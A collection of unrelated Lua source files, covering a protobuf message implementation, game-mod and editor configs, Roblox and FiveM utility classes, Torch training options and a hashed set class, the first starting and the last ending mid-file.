local message = message_meta._member.__call()
message.MergeFromString(s)
return message
end
end
local function _IsPresent(descriptor, value)
if descriptor.label == FieldDescriptor.LABEL_REPEATED then
return value
elseif descriptor.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
return value._is_present_in_parent
else
return true
end
end
function sortFunc(a, b)
return a.index < b.index
end
function pairsByKeys (t, f)
local a = {}
for n in pairs(t) do table.insert(a, n) end
table.sort(a, f)
local i = 0 -- iterator variable
local iter = function () -- iterator function
i = i + 1
if a[i] == nil then return nil
else return a[i], t[a[i]]
end
end
return iter
end
local function _AddListFieldsMethod(message_descriptor, message_meta)
message_meta._member.ListFields = function (self)
local list_field = function(fields)
--local f, s, v = pairs(self._fields)
local f,s,v = pairsByKeys(self._fields, sortFunc)
local iter = function(a, i)
while true do
local descriptor, value = f(a, i)
if descriptor == nil then
return
elseif _IsPresent(descriptor, value) then
return descriptor, value
end
end
end
return iter, s, v
end
return list_field(self._fields)
end
end
local function _AddHasFieldMethod(message_descriptor, message_meta)
local singular_fields = {}
for _, field in ipairs(message_descriptor.fields) do
if field.label ~= FieldDescriptor.LABEL_REPEATED then
singular_fields[field.name] = field
end
end
message_meta._member.HasField = function (self, field_name)
field = singular_fields[field_name]
if field == nil then
error('Protocol message has no singular "'.. field_name.. '" field.')
end
if field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
value = self._fields[field]
return value ~= nil and value._is_present_in_parent
else
local valueTmp = self._fields[field]
return valueTmp ~= nil
end
end
end
local function _AddClearFieldMethod(message_descriptor, message_meta)
local singular_fields = {}
for _, field in ipairs(message_descriptor.fields) do
if field.label ~= FieldDescriptor.LABEL_REPEATED then
singular_fields[field.name] = field
end
end
message_meta._member.ClearField = function(self, field_name)
field = singular_fields[field_name]
if field == nil then
error('Protocol message has no singular "'.. field_name.. '" field.')
end
if self._fields[field] then
self._fields[field] = nil
end
message_meta._member._Modified(self)
end
end
local function _AddClearExtensionMethod(message_meta)
message_meta._member.ClearExtension = function(self, extension_handle)
if self._fields[extension_handle] == nil then
self._fields[extension_handle] = nil
end
message_meta._member._Modified(self)
end
end
local function _AddClearMethod(message_descriptor, message_meta)
message_meta._member.Clear = function(self)
self._fields = {}
message_meta._member._Modified(self)
end
end
local function _AddStrMethod(message_meta)
local format = text_format.msg_format
message_meta.__tostring = function(self)
return format(self)
end
end
local function _AddHasExtensionMethod(message_meta)
message_meta._member.HasExtension = function(self, extension_handle)
if extension_handle.label == FieldDescriptor.LABEL_REPEATED then
error(extension_handle.full_name .. ' is repeated.')
end
if extension_handle.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
value = self._fields[extension_handle]
return value ~= nil and value._is_present_in_parent
else
return self._fields[extension_handle]
end
end
end
local function _AddSetListenerMethod(message_meta)
message_meta._member._SetListener = function(self, listener)
if listener ~= nil then
self._listener = listener_mod.NullMessageListener()
else
self._listener = listener
end
end
end
local function _AddByteSizeMethod(message_descriptor, message_meta)
message_meta._member.ByteSize = function(self)
--kaiser
--bug:这里在Repeat字段的结构体如果第一个字段不是int变量会产生_cached_byte_size_dirty为false而导致byte size为0
--如果bytesize为0让它强制计算byte size
if not self._cached_byte_size_dirty and self._cached_byte_size > 0 then
return self._cached_byte_size
end
local size = 0
for field_descriptor, field_value in message_meta._member.ListFields(self) do
size = field_descriptor._sizer(field_value) + size
end
self._cached_byte_size = size
self._cached_byte_size_dirty = false
self._listener_for_children.dirty = false
return size
end
end
local function _AddSerializeToStringMethod(message_descriptor, message_meta)
message_meta._member.SerializeToString = function(self)
if not message_meta._member.IsInitialized(self) then
error('Message is missing required fields: ' ..
table.concat(message_meta._member.FindInitializationErrors(self), ','))
end
return message_meta._member.SerializePartialToString(self)
end
message_meta._member.SerializeToIOString = function(self, iostring)
if not message_meta._member.IsInitialized(self) then
error('Message is missing required fields: ' ..
table.concat(message_meta._member.FindInitializationErrors(self), ','))
end
return message_meta._member.SerializePartialToIOString(self, iostring)
end
end
local function _AddSerializePartialToStringMethod(message_descriptor, message_meta)
local concat = table.concat
local _internal_serialize = function(self, write_bytes)
for field_descriptor, field_value in message_meta._member.ListFields(self) do
field_descriptor._encoder(write_bytes, field_value)
end
end
local _serialize_partial_to_iostring = function(self, iostring)
local w = iostring.write
local write = function(value)
w(iostring, value)
end
_internal_serialize(self, write)
return
end
local _serialize_partial_to_string = function(self)
local out = {}
local write = function(value)
out[#out + 1] = value
end
_internal_serialize(self, write)
return concat(out)
end
message_meta._member._InternalSerialize = _internal_serialize
message_meta._member.SerializePartialToIOString = _serialize_partial_to_iostring
message_meta._member.SerializePartialToString = _serialize_partial_to_string
end
local function _AddMergeFromStringMethod(message_descriptor, message_meta)
local ReadTag = decoder.ReadTag
local SkipField = decoder.SkipField
local decoders_by_tag = message_meta._decoders_by_tag
local _internal_parse = function(self, buffer, pos, pend)
message_meta._member._Modified(self)
local field_dict = self._fields
local tag_bytes, new_pos
local field_decoder
while pos ~= pend do
tag_bytes, new_pos = ReadTag(buffer, pos)
field_decoder = decoders_by_tag[tag_bytes]
if field_decoder == nil then
new_pos = SkipField(buffer, new_pos, pend, tag_bytes)
if new_pos == -1 then
return pos
end
pos = new_pos
else
pos = field_decoder(buffer, new_pos, pend, self, field_dict)
end
end
return pos
end
message_meta._member._InternalParse = _internal_parse
local merge_from_string = function(self, serialized)
local length = #serialized
if _internal_parse(self, serialized, 0, length) ~= length then
error('Unexpected end-group tag.')
end
return length
end
message_meta._member.MergeFromString = merge_from_string
message_meta._member.ParseFromString = function(self, serialized)
message_meta._member.Clear(self)
merge_from_string(self, serialized)
end
end
local function _AddIsInitializedMethod(message_descriptor, message_meta)
local required_fields = {}
for _, field in ipairs(message_descriptor.fields) do
if field.label == FieldDescriptor.LABEL_REQUIRED then
required_fields[#required_fields + 1] = field
end
end
message_meta._member.IsInitialized = function(self, errors)
for _, field in ipairs(required_fields) do
if self._fields[field] == nil or
(field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE and not self._fields[field]._is_present_in_parent) then
if errors ~= nil then
errors[#errors + 1] = message_meta._member.FindInitializationErrors(self)
end
return false
end
end
for field, value in pairs(self._fields) do
if field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
if field.label == FieldDescriptor.LABEL_REPEATED then
for _, element in ipairs(value) do
if not element:IsInitialized() then
if errors ~= nil then
errors[#errors + 1] = message_meta._member.FindInitializationErrors(self)
end
return false
end
end
elseif value._is_present_in_parent and not value:IsInitialized() then
if errors ~= nil then
errors[#errors + 1] = message_meta._member.FindInitializationErrors(self)
end
return false
end
end
end
return true
end
message_meta._member.FindInitializationErrors = function(self)
local errors = {}
for _,field in ipairs(required_fields) do
if not message_meta._member.HasField(self, field.name) then
errors[#errors + 1] = field.name
end
end
for field, value in message_meta._member.ListFields(self) do
if field.cpp_type == FieldDescriptor.CPPTYPE_MESSAGE then
if field.is_extension then
name = string.format("(%s)", field.full_name)
else
name = field.name
end
if field.label == FieldDescriptor.LABEL_REPEATED then
for i, element in ipairs(value) do
prefix = string.format("%s[%d].", name, i)
sub_errors = element:FindInitializationErrors()
for _, e in ipairs(sub_errors) do
errors[#errors + 1] = prefix .. e
end
end
else
prefix = name .. "."
sub_errors = value:FindInitializationErrors()
for _, e in ipairs(sub_errors) do
errors[#errors + 1] = prefix .. e
end
end
end
end
return errors
end
end
local function _AddMergeFromMethod(message_meta)
local LABEL_REPEATED = FieldDescriptor.LABEL_REPEATED
local CPPTYPE_MESSAGE = FieldDescriptor.CPPTYPE_MESSAGE
message_meta._member.MergeFrom = function (self, msg)
assert(msg ~= self)
message_meta._member._Modified(self)
local fields = self._fields
for field, value in pairs(msg._fields) do
if field.label == LABEL_REPEATED or field.cpp_type == CPPTYPE_MESSAGE then
field_value = fields[field]
if field_value == nil then
field_value = field._default_constructor(self)
fields[field] = field_value
end
field_value:MergeFrom(value)
else
self._fields[field] = value
end
end
end
end
local function _AddMessageMethods(message_descriptor, message_meta)
_AddListFieldsMethod(message_descriptor, message_meta)
_AddHasFieldMethod(message_descriptor, message_meta)
_AddClearFieldMethod(message_descriptor, message_meta)
if message_descriptor.is_extendable then
_AddClearExtensionMethod(message_meta)
_AddHasExtensionMethod(message_meta)
end
_AddClearMethod(message_descriptor, message_meta)
-- _AddEqualsMethod(message_descriptor, message_meta)
_AddStrMethod(message_meta)
_AddSetListenerMethod(message_meta)
_AddByteSizeMethod(message_descriptor, message_meta)
_AddSerializeToStringMethod(message_descriptor, message_meta)
_AddSerializePartialToStringMethod(message_descriptor, message_meta)
_AddMergeFromStringMethod(message_descriptor, message_meta)
_AddIsInitializedMethod(message_descriptor, message_meta)
_AddMergeFromMethod(message_meta)
end
local function _AddPrivateHelperMethods(message_meta)
local Modified = function (self)
if not self._cached_byte_size_dirty then
self._cached_byte_size_dirty = true
self._listener_for_children.dirty = true
self._is_present_in_parent = true
self._listener:Modified()
end
end
message_meta._member._Modified = Modified
message_meta._member.SetInParent = Modified
end
local function property_getter(message_meta)
local getter = message_meta._getter
local member = message_meta._default
return function (self, property)
local g = getter[property]
if g then
return g(self)
else
return member[property]
end
end
end
local function property_setter(message_meta)
local setter = message_meta._setter
return function (self, property, value)
local s = setter[property]
if s then
s(self, value)
else
error(property .. " not found")
end
end
end
---往meta里增加一个普通field的方法
---@param field google_protobuf_descriptor_pb.FieldDescriptorProto
---@param meta table
local _AddFieldMethod = function (field, meta)
meta._setter[field.name] = function (self, value)
end
end
---往meta里增加一个map的方法
---@param field google_protobuf_descriptor_pb.FieldDescriptorProto
---@param meta table
local _AddMapFieldMethod = function (field, meta)
meta._setter[field.name] = function (self, value)
end
end
---往meta里增加一个repeated的方法
---@param field google_protobuf_descriptor_pb.FieldDescriptorProto
---@param meta table
local _AddRepeatedFieldMethod = function (field, meta)
meta._setter[field.name] = function (self, value)
end
end
---往meta里增加每个字段的方法
---@param descriptor google_protobuf_descriptor_pb.DescriptorProto
---@param meta table
local _AddFieldsMethod = function (descriptor, meta)
for _, field in ipairs(descriptor.field) do
if field.label == [[LABEL_REPEATED]] then
-- 如果是map,一定会生成一个额外的message
local is_map = false
if field.type == [[TYPE_MESSAGE]] then
local sub_message = registry.message[field.type_name]
if sub_message._Descriptor.options.map_entry then
is_map = true
end
end
if is_map then
_AddMapFieldMethod(field, meta)
else
_AddRepeatedFieldMethod(field, meta)
end
else
_AddFieldMethod(field, meta)
end
end
end
---@class protobuf.Message
---@field ParseFromString fun(self, s:string)
---@field SerializeToString fun(self, s:string)
---@param descriptor google_protobuf_descriptor_pb.DescriptorProto
---@return fun():protobuf.Message
protobuf.Message = function (descriptor)
local factory = {}
local meta = {}
meta._descriptor = descriptor
meta._getter = {}
meta._setter = {}
meta._default = {}
-- 对每一个字段添加对应的方法
_AddFieldsMethod(descriptor, meta)
_AddPropertiesForFields(descriptor, meta)
_AddPropertiesForExtensions(descriptor, meta)
_AddStaticMethods(meta)
_AddMessageMethods(descriptor, meta)
_AddPrivateHelperMethods(meta)
meta.__index = property_getter(meta)
meta.__newindex = property_setter(meta)
factory.__call = function ()
local default = {}
return setmetatable(default, meta)
end
return setmetatable({}, factory)
end
return protobuf
|
--[[
Name: WetRoadsReloaded
Filename: MainClassS.lua
Authors: Sam@ke
--]]
local Instance = nil
MainClassS = {}
function MainClassS:constructor()
mainOutput("SERVER // ***** Wet Roads Reloaded was started *****")
mainOutput("MainClassS was loaded.")
setFPSLimit(60)
self.updateInterVal = 250
self.m_Update = bind(self.update, self)
self.updateTimer = setTimer(self.m_Update, self.updateInterVal , 0)
end
function MainClassS:update()
--setWeather(12)
end
function MainClassS:destructor()
if (self.updateTimer) then
self.updateTimer:destroy()
self.updateTimer = nil
end
mainOutput("MainClassS was deleted.")
end
addEventHandler("onResourceStart", resourceRoot,
function()
Instance = new(MainClassS)
end)
addEventHandler("onResourceStop", resourceRoot,
function()
if (Instance) then
delete(Instance)
Instance = nil
end
end)
|
local telescope = require("telescope")
local actions = require("telescope.actions")
local sorters = require("telescope.sorters")
telescope.setup({
defaults = {
mappings = {
-- i = {
-- ["<ESC>"] = actions.close,
-- }
},
selection_strategy = "reset",
sorting_strategy = "ascending",
layout_strategy = "horizontal",
file_ignore_patterns = { "node_modules" },
generic_sorter = require("telescope.sorters").get_generic_fuzzy_sorter,
},
pickers = {
live_grep = { prompt_title = "Search" },
find_files = {
layout_strategy = "center",
sorting_strategy = "ascending",
prompt_title = "Search",
show_preview = false,
preview = false,
layout_config = {
width = function(_, max_columns, _)
return math.min(max_columns - 3, 80)
end,
height = function(_, _, max_lines)
return math.min(max_lines - 4, 25)
end,
preview_cutoff = 100 -- have no idea how it works, any value above 40 removes preview
},
},
},
extensions = {
fzf = {
fuzzy = true,
override_generic_sorter = true,
override_file_sorter = true
},
["ui-select"] = {
require("telescope.themes").get_dropdown {
-- even more opts
}
}
}
})
telescope.load_extension("fzf")
telescope.load_extension("dap")
telescope.load_extension("ui-select")
telescope.load_extension("notify")
telescope.load_extension("media_files")
local opts = { noremap = true, silent = true }
vim.api.nvim_set_keymap("n", "<Leader>ff", "<CMD>Telescope find_files<CR>", opts)
vim.api.nvim_set_keymap("n", "<Leader>ft", "<CMD>Telescope live_grep<CR>", opts)
--[[
TelescopeSelection selected item
TelescopeSelectionCaret selection caret
TelescopeMultiSelection multisections
TelescopeNormal floating windows created by telescope.
Border highlight groups.
TelescopeBorder
TelescopePromptBorder
TelescopeResultsBorder
TelescopePreviewBorder
TelescopeMatching Used for highlighting characters that you match.
TelescopePromptPrefix Used for the prompt prefix
--]]
-- vim.api.nvim_exec(
-- [[
-- highlight TelescopeSelection guifg=#569cd6 gui=bold
-- highlight TelescopeSelectionCaret guifg=#f44747
-- highlight TelescopeMultiSelection guifg=#928374
-- highlight TelescopeNormal guibg=#1e1e1e
--
-- highlight TelescopeBorder guifg=#505050 gui=bold
-- highlight TelescopePromptBorder guifg=#505050 gui=bold
-- highlight TelescopeResultsBorder guifg=#505050 gui=bold
-- highlight TelescopePreviewBorder guifg=#505050 gui=bold
--
-- highlight TelescopeMatching guifg=#608b4e
-- highlight TelescopePromptPrefix guifg=#f44747
-- ]],
-- true
-- )
|
local _, ns = ...
local B, C, L, DB, P = unpack(ns)
local S = P:GetModule("Skins")
local Bar = B:GetModule("Actionbar")
local _G = getfenv(0)
function S:GearMenu()
if not S.db["GearMenu"] then return end
local rggm = _G.rggm
if not rggm then return end
local fontScale = .37
local function UpdateTexture(slot)
local texture = slot:GetNormalTexture()
if texture and slot.bg then
texture:SetTexCoord(unpack(DB.TexCoord))
texture:SetInside(slot.bg)
end
end
hooksecurefunc(rggm.uiHelper, "UpdateSlotTextureAttributes", UpdateTexture)
local function SetKeyBindingFont(slot, size)
slot.keyBindingText:SetFont(DB.Font[1], size * fontScale, DB.Font[3])
end
hooksecurefunc(rggm.gearBar, "UpdateGearSlotKeyBindingTextSize", SetKeyBindingFont)
local function reskinGear(slot)
slot:SetBackdrop(nil)
slot.SetBackdrop = B.Dummy
slot.bg = B.SetBD(slot)
slot.bg:SetInside()
slot.cooldownOverlay:SetInside(slot.bg)
slot.highlightFrame:SetAlpha(0)
local hl= slot:CreateTexture(nil, "HIGHLIGHT")
hl:SetColorTexture(1, 1, 1, .25)
hl:SetInside(slot.bg)
UpdateTexture(slot)
end
local origCreateGearSlot = rggm.gearBar.CreateGearSlot
rggm.gearBar.CreateGearSlot = function (...)
local slot = origCreateGearSlot(...)
reskinGear(slot)
return slot
end
local origCreateKeyBindingText = rggm.gearBar.CreateKeyBindingText
rggm.gearBar.CreateKeyBindingText = function(slot, size)
local keybinding = origCreateKeyBindingText(slot, size)
keybinding:SetFont(DB.Font[1], size * fontScale, DB.Font[3])
return keybinding
end
local origCreateChangeSlot = rggm.gearBarChangeMenu.CreateChangeSlot
rggm.gearBarChangeMenu.CreateChangeSlot = function(...)
local slot = origCreateChangeSlot(...)
reskinGear(slot)
return slot
end
end
S:RegisterSkin("GearMenu", S.GearMenu)
|
local ffi = require('ffi')
local temp = {}
function temp.name()
if ffi.os == 'Windows' then
return os.getenv('TEMP') .. os.tmpname()
end
return os.tmpname()
end
return temp
|
package("shaderwriter")
set_homepage("https://github.com/DragonJoker/ShaderWriter")
set_description("Library used to write shaders from C++, and export them in either GLSL, HLSL or SPIR-V.")
set_urls("https://github.com/DragonJoker/ShaderWriter.git")
add_versions("1.0", "a5ef99ff141693ef28cee0e464500888cabc65ad")
add_deps("cmake")
add_links("sdwShaderWriter", "sdwCompilerHlsl", "sdwCompilerGlsl", "sdwCompilerSpirV", "sdwShaderAST")
on_install("windows", "macosx", "linux", function (package)
local configs =
{
"-DSDW_BUILD_TESTS=OFF",
"-DSDW_BUILD_EXPORTERS=ON",
"-DSDW_BUILD_STATIC_SDW=".. (package:config("shared") and "OFF" or "ON"),
"-DSDW_BUILD_EXPORTER_GLSL_STATIC=".. (package:config("shared") and "OFF" or "ON"),
"-DSDW_BUILD_EXPORTER_HLSL_STATIC=".. (package:config("shared") and "OFF" or "ON"),
"-DSDW_BUILD_EXPORTER_SPIRV_STATIC=".. (package:config("shared") and "OFF" or "ON"),
"-DSDW_GENERATE_SOURCE=OFF",
"-DPROJECTS_USE_PRECOMPILED_HEADERS=OFF",
"-DCMAKE_BUILD_TYPE=" .. (package:debug() and "Debug" or "Release")
}
import("package.tools.cmake").install(package, configs)
end)
on_test(function (package)
assert(package:check_cxxsnippets({test = [[
#include <CompilerGlsl/compileGlsl.hpp>
#include <CompilerSpirV/compileSpirV.hpp>
#include <ShaderWriter/Intrinsics/Intrinsics.hpp>
#include <ShaderWriter/Source.hpp>
static void test()
{
sdw::ComputeWriter writer;
}
]]}, {configs = {languages = "c++17"}}))
end)
|
--[=[
Lua-side duplication of the API of events on Roblox objects.
Signals are needed for to ensure that for local events objects are passed by
reference rather than by value where possible, as the BindableEvent objects
always pass signal arguments by value, meaning tables will be deep copied.
Roblox's deep copy method parses to a non-lua table compatable format.
This class is designed to work both in deferred mode and in regular mode.
It follows whatever mode is set.
```lua
local signal = Signal.new()
local arg = {}
signal:Connect(function(value)
assert(arg == value, "Tables are preserved when firing a Signal")
end)
signal:Fire(arg)
```
:::info
Why this over a direct [BindableEvent]? Well, in this case, the signal
prevents Roblox from trying to serialize and desialize each table reference
fired through the BindableEvent.
:::
@class Signal
]=]
local HttpService = game:GetService("HttpService")
local ENABLE_TRACEBACK = false
local Signal = {}
Signal.__index = Signal
Signal.ClassName = "Signal"
--[=[
Returns whether a class is a signal
@param value any
@return boolean
]=]
function Signal.isSignal(value)
return type(value) == "table"
and getmetatable(value) == Signal
end
--[=[
Constructs a new signal.
@return Signal<T>
]=]
function Signal.new()
local self = setmetatable({}, Signal)
self._bindableEvent = Instance.new("BindableEvent")
self._argMap = {}
self._source = ENABLE_TRACEBACK and debug.traceback() or ""
-- Events in Roblox execute in reverse order as they are stored in a linked list and
-- new connections are added at the head. This event will be at the tail of the list to
-- clean up memory.
self._bindableEvent.Event:Connect(function(key)
self._argMap[key] = nil
-- We've been destroyed here and there's nothing left in flight.
-- Let's remove the argmap too.
-- This code may be slower than leaving this table allocated.
if (not self._bindableEvent) and (not next(self._argMap)) then
self._argMap = nil
end
end)
return self
end
--[=[
Fire the event with the given arguments. All handlers will be invoked. Handlers follow
@param ... T -- Variable arguments to pass to handler
]=]
function Signal:Fire(...)
if not self._bindableEvent then
warn(("Signal is already destroyed. %s"):format(self._source))
return
end
local args = table.pack(...)
-- TODO: Replace with a less memory/computationally expensive key generation scheme
local key = HttpService:GenerateGUID(false)
self._argMap[key] = args
-- Queues each handler onto the queue.
self._bindableEvent:Fire(key)
end
--[=[
Connect a new handler to the event. Returns a connection object that can be disconnected.
@param handler (... T) -> () -- Function handler called when `:Fire(...)` is called
@return RBXScriptConnection
]=]
function Signal:Connect(handler)
if not (type(handler) == "function") then
error(("connect(%s)"):format(typeof(handler)), 2)
end
return self._bindableEvent.Event:Connect(function(key)
-- note we could queue multiple events here, but we'll do this just as Roblox events expect
-- to behave.
local args = self._argMap[key]
if args then
handler(table.unpack(args, 1, args.n))
else
error("Missing arg data, probably due to reentrance.")
end
end)
end
--[=[
Wait for fire to be called, and return the arguments it was given.
@yields
@return T
]=]
function Signal:Wait()
local key = self._bindableEvent.Event:Wait()
local args = self._argMap[key]
if args then
return table.unpack(args, 1, args.n)
else
error("Missing arg data, probably due to reentrance.")
return nil
end
end
--[=[
Disconnects all connected events to the signal. Voids the signal as unusable.
Sets the metatable to nil.
]=]
function Signal:Destroy()
if self._bindableEvent then
-- This should disconnect all events, but in-flight events should still be
-- executed.
self._bindableEvent:Destroy()
self._bindableEvent = nil
end
-- Do not remove the argmap. It will be cleaned up by the cleanup connection.
setmetatable(self, nil)
end
return Signal
|
_G.StateBag = {}
_G.StateBagMethods = {}
StateBagMethods.__call = function(self, entityId, isPlayer)
if type(entityId) == 'number' then
local o = setmetatable({}, {__index = self})
if isPlayer ~= nil and isPlayer == true then
o.id = entityId
else
o.localId = entityId
o.networked = NetworkGetEntityIsNetworked(entityId)
if o.networked then
o.id = NetworkGetNetworkIdFromEntity(entityId)
else
o.id = entityId
end
end
return o
else
assert(nil, "The entityId expected number, but got "..type(entityId))
end
end
StateBagMethods.__index = {
clearAll = function(self, shared)
if shared ~= nil and type(shared) ~= 'boolean' then
assert(nil, "shared expected a boolean, but got "..type(shared))
end
TriggerEvent('__classes:client:statebags:update:all', self.id, {}, shared)
end,
clear = function(self, key, shared)
if shared ~= nil and type(shared) ~= 'boolean' then
assert(nil, "shared expected a boolean, but got "..type(shared))
end
TriggerEvent('__classes:client:statebags:update:one', self.id, key, nil, shared)
end,
set = function(self, key, value, shared)
if key == nil then
error "key was nil"
end
if value == nil then
error "value was nil"
end
if shared ~= nil and type(shared) ~= 'boolean' then
assert(nil, "shared expected a boolean, but got "..type(shared))
end
TriggerEvent('__classes:client:statebags:update:one', self.id, key, value, shared)
return true
end,
get = function(self, key)
if key == nil then
error "key was nil"
end
local callback = promise:new()
TriggerEvent('__classes:client:statebags:get', self.id, key, function(value)
callback:resolve(value)
end)
return Citizen.Await(callback)
end,
}
setmetatable(StateBag, StateBagMethods)
|
local L = ElvUI[1].Libs.ACL:NewLocale("ElvUI", "frFR")
if not L then return end
--@localization(locale="frFR", format="lua_additive_table")
|
local fail = false
print("Test: and...")
if 40031&a8 ~= uint.u8(19) then
print("\tFail: 40031&a8 ~= 19")
fail = true
end
if b8&c8 ~= uint.u8(142) then
print("\tFail: b8&c8 ~= 142")
fail = true
end
if (c8&b8):asnumber() ~= 142 then
print("\tFail: c8b8 ~= 142")
fail = true
end
if not fail then
print("\tPass")
end
|
require "utils"
--- All parameters goes here
local config = config or {}
function config.parse(arg)
local cmd = torch.CmdLine()
cmd:text()
cmd:text('Multi-Task Classification FCN')
cmd:text()
-- Parameters
-- model configuration
cmd:option('-model', 'model_deep.lua', 'model file')
cmd:option('-input_channel', 3, '# of input channels')
cmd:option('-output_channel', 3, '# of output channels')
-- testing
cmd:option('-test_model', '', 'model used for testing')
cmd:option('-result_path', './result/', 'path to save result')
cmd:option('-max_count', 1000000, 'max number of data to test')
-- data loader
cmd:option('-train_file', '', 'train file, compulsory');
cmd:option('-test_file', './image/test_list.txt', 'test file, compulsory');
-- training and testing
cmd:option('-gpuid', 1, 'gpu id')
cmd:option('-optim_state', {rho=0.95, eps=1e-6, learningRate=1e-3, learningRateMin=1e-7, momentum=0.9}, 'optim state')
cmd:option('-lr_decay', 150000, 'iterations between lr decreses')
cmd:option('-lr_decay_t', 5, 'lr decay times')
cmd:option('-nb_epoch', 20, 'number of epoches')
cmd:option('-batch_size', 10, 'batch size')
cmd:option('-pixel_means', {128, 128, 128}, 'Pixel mean values (RGB order)')
-- resume
cmd:option('-resume_training', false, 'whether resume training')
cmd:option('-saved_model_weights', '', 'path to saved model weights')
cmd:option('-saved_optim_state', '', 'path to saved model weights')
-- finetune
cmd:option('-finetune', false, '')
cmd:option('-finetune_model', '', '')
cmd:option('-finetune_init_lr', 1e-4, '')
-- save/print/log
cmd:option('-snapshot_iters', 10000, 'Iterations between snapshots (used for saving the network)')
cmd:option('-print_iters', 20, 'Iterations between print')
cmd:option('-log_iters', 20, 'Iterations between log')
cmd:option('-log_path','./logs/','Path to be used for logging')
cmd:option('-ps', '', 'prefix: path&name to model and snapshot')
cmd:option('-verbose', false, 'show more message')
-- Parsing the command line
config = cmd:parse(arg or {})
config.colors = {{0, 0, 0}, -- black
{1, 0, 0}, -- red
{0, 1, 0}, -- green
{0, 0, 1}, -- blue
{1, 1, 0}, -- yellow
{1, 0, 1}, -- magenta
{0, 1, 1}, -- cyan
{1, 1, 1} -- white
}
return config
end
return config
|
local PadFastLSTM, parent = torch.class('srnn.PadFastLSTM', 'srnn.AbstractLenCell')
function PadFastLSTM:buildStep(inputSize, outputSize, layers, dropout)
return srnn.units.getFastLSTMUnit(inputSize, outputSize, layers, dropout)
end
|
local sha1 = require 'sha1'
local ti, ts = table.insert, table.sort
local _hash, _HMAC = sha1.binary, sha1.hmac_binary
local HMAC_IV = "1234567890"
local function _getElementHash(element)
local mt = getmetatable(v)
if type(mt)=='table' and type(mt.__hash)=='function' then
return mt.__hash(v)
else
assert(type(_hash)=='function', 'Invalid hash function')
return _hash(tostring(element))
end
end
local function _compareElements(a, b)
return tostring(a) < tostring(b)
end
local function new(initialElements, getElementHash, compareElements)
local obj = {}
local elements = {}
local index = {}
local checkSum = ""
local checkSumIV = sha1.binary(HMAC_IV)
local elementsCount = 0
local getElementHash = getElementHash or _getElementHash
local compareElements = compareElements or _compareElements
local function sort()
if compareElements ~= _compareElements then
print(compareElements, _compareElements)
ts(elements, compareElements)
end
end
local function rehash()
assert(type(_HMAC)=='function', 'Invalid HMAC function')
local getElementHash = obj.hash
local out = checkSumIV
index = {}
sort()
for i,v in ipairs(elements) do
local hash = getElementHash(v)
index[hash] = i
out = _HMAC(out, hash)
end
checkSum = out
end
local function init(initialElements)
for _,v in ipairs(initialElements) do
ti(elements, v)
end
rehash()
elementsCount = #elements
end
local function clone()
return new(elements, getElementHash, compareElements)
end
local function getElement(_, index)
if index=='hash' then
return getElementHash
elseif index=='compare' then
return compareElements
else
return elements[index]
end
end
local function setElement(_, k, v)
if k=='hash' then
assert(type(v)=='function', 'Invalid hash function')
getElementHash = v
rehash()
elseif k=='compare' then
assert(type(v)=='function', 'Invalid compare function')
compareElements = v
sort()
end
end
local function hasElement(element)
local hash = getElementHash(element)
return type(index[hash])=='number'
end; obj.has = hasElement
local function new2(t, a, b)
return new(t, (a.hash ~= _getElementHash) and a.hash or b.hash, (a.compare ~= _compareElements) and a.compare or b.compare)
end
local function addElements(a, b)
assert(type(a)=='table', 'Invalid argument type on the left side')
assert(type(b)=='table', 'Invalid argument type on the right side')
local out = {}
if type(a.has)=='function' and type(b.has)=='function' then
local has = a.has
if (a.checkSum() ~= b.checkSum()) then
for _,v in ipairs(a) do
ti(out, v)
end
for _,v in ipairs(b) do
if not has(v) then
ti(out, v)
end
end
return new2(out, a, b)
else
return a()
end
elseif type(a.has)=='function' then
local has = a.has
for _,v in ipairs(a) do
ti(out, v)
end
for _,v in ipairs(b) do
if not has(v) then
ti(out, v)
end
end
return new(out, a.hash, a.compare)
elseif type(b.has)=='function' then
local has = b.has
for _,v in ipairs(b) do
ti(out, v)
end
for _,v in ipairs(a) do
if not has(v) then
ti(out, v)
end
end
return new(out, b.hash, b.compare)
else
error('Invalid arguments')
end
end
local function intersectElements(a, b)
assert(type(a)=='table', 'Invalid argument type on the left side')
assert(type(b)=='table', 'Invalid argument type on the right side')
local out = {}
if type(a.has)=='function' and type(b.has)=='function' then
local has = a.has
if (a.checkSum() ~= b.checkSum()) then
for _,v in ipairs(b) do
if has(v) then
ti(out, v)
end
end
return new2(out, a, b)
else
return a()
end
elseif type(a.has)=='function' then
local has = a.has
for _,v in ipairs(b) do
if has(v) then
ti(out, v)
end
end
return new(out, a.hash, a.compare)
elseif type(b.has)=='function' then
local has = b.has
for _,v in ipairs(a) do
if has(v) then
ti(out, v)
end
end
return new(out, b.hash, b.compare)
else
error('Invalid arguments')
end
end
local function subtractElements(a, b)
assert(type(a)=='table', 'Invalid argument type on the left side')
assert(type(b)=='table', 'Invalid argument type on the right side')
local out = {}
if type(a.has)=='function' and type(b.has)=='function' then
if (a.checkSum() ~= b.checkSum()) then
for _,v in ipairs(a) do
if not b.has(v) then
ti(out, v)
end
end
end
return new2(out, a, b)
elseif type(a.has)=='function' then
local index = {}
local getElementHash = a.hash
for i,v in ipairs(b) do
index[getElementHash(v)] = i
end
for _,v in ipairs(a) do
local hash = getElementHash(v)
if type(index[hash])~='number' then
ti(out, v)
end
end
return new(out, a.hash, a.compare)
elseif type(b.has)=='function' then
local index = {}
local getElementHash = b.hash
for i,v in ipairs(a) do
index[getElementHash(v)] = i
end
for _,v in ipairs(b) do
local hash = getElementHash(v)
if type(index[hash])~='number' then
ti(out, v)
end
end
return new(out, b.hash, b.compare)
else
error('Invalid arguments')
end
end
local function operateOnElements(_, fn)
assert(type(fn)=='function', 'Function argument expected')
for _,v in ipairs(elements) do
fn(v)
end
end
local function filterElements(_, fn)
assert(type(fn)=='function', 'Function argument expected')
local out = {}
for _,v in ipairs(elements) do
if fn(v) then
ti(out, v)
end
end
return new(out, getElementHash, compareElements)
end
local function pairsIterator(_)
return pairs(elements)
end
local function ipairsIterator(_)
return ipairs(elements)
end
local function getElementsCount(_)
return elementsCount
end
local function setComparator(a, b)
assert(type(a)=='table' and type(a.checkSum)=='function', 'Invalid operand type on the left side')
assert(type(b)=='table' and type(b.checkSum)=='function', 'Invalid operand type on the right side')
return a.checkSum() == b.checkSum()
end
local function lessThan(a, b)
assert(type(a)=='table', 'Invalid operand type on the left side')
